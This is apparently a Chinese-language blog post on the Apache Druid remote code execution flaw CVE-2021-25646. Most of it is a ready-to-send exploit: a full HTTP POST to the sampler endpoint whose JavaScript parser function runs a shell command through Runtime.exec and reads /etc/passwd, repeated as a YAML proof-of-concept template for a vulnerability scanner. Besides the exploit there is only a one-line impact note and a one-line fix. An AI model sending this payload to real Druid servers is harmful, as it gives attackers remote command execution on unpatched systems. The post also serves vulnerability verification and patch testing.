Dec 16, 2023

Apache Druid 代码执行漏洞（CVE-2021-25646）

http://localhost:8888/druid/indexer/v1/sampler

功能点：

漏洞请求：

POST /druid/indexer/v1/sampler HTTP/1.1
Host: localhost:8888
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/json

{
    "type":"index",
    "spec":{
        "ioConfig":{
            "type":"index",
            "firehose":{
                "type":"local",
                "baseDir":"/etc",
                "filter":"passwd"
            }
        },
        "dataSchema":{
            "dataSource":"test",
            "parser":{
                "parseSpec":{
                "format":"javascript",
                "timestampSpec":{

                },
                "dimensionsSpec":{

                },
                "function":"function(){var a = new java.util.Scanner(java.lang.Runtime.getRuntime().exec([\"sh\",\"-c\",\"id\"]).getInputStream()).useDelimiter(\"\\A\").next();return {timestamp:123123,test: a}}",
                "":{
                    "enabled":"true"
                }
                }
            }
        }
    },
    "samplerConfig":{
        "numRows":10
    }
}

Druid.yaml

name: poc-yaml-druid-rce-cve-2021-25646-2
level: 3
finger: |
  "apache-druid" in finger.name
rules:
  - method: POST
    headers:
      Content-Type: application/json;charset=UTF-8
    path: /druid/indexer/v1/sampler?for=filter
    body: >
      {
          "type":"index",
          "spec":{
              "ioConfig":{
                  "type":"index",
                  "firehose":{
                      "type":"local",
                      "baseDir":"/etc",
                      "filter":"passwd"
                  }
              },
              "dataSchema":{
                  "dataSource":"test",
                  "parser":{
                      "parseSpec":{
                      "format":"javascript",
                      "timestampSpec":{

                      },
                      "dimensionsSpec":{

                      },
                      "function":"function(){var a = new java.util.Scanner(java.lang.Runtime.getRuntime().exec([\"sh\",\"-c\",\"id\"]).getInputStream()).useDelimiter(\"\\A\").next();return {timestamp:123123,test: a}}",
                      "":{
                          "enabled":"true"
                      }
                      }
                  }
              }
          },
          "samplerConfig":{
              "numRows":10
          }
      }
    expression: |
      response.status == 200 && response.body.bcontains(b"123123")
detail:
  author: ez
  links:
    - https://github.com/vulhub/vulhub/blob/master/apache-druid/CVE-2021-25646/README.zh-cn.md

- https://github.com/vulhub/vulhub/blob/master/apache-druid/CVE-2021-25646/README.zh-cn.md

漏洞截图：

图形用户界面, 文本, 应用程序, 电子邮件描述已自动生成

漏洞危害描述：该漏洞可导致获取webshell，提权利用

修复建议：安装相应更新

Apache Druid 代码执行漏洞（CVE-2021-25646）

Apache Druid 代码执行漏洞（CVE-2021-25646）

Comments

Leave a comment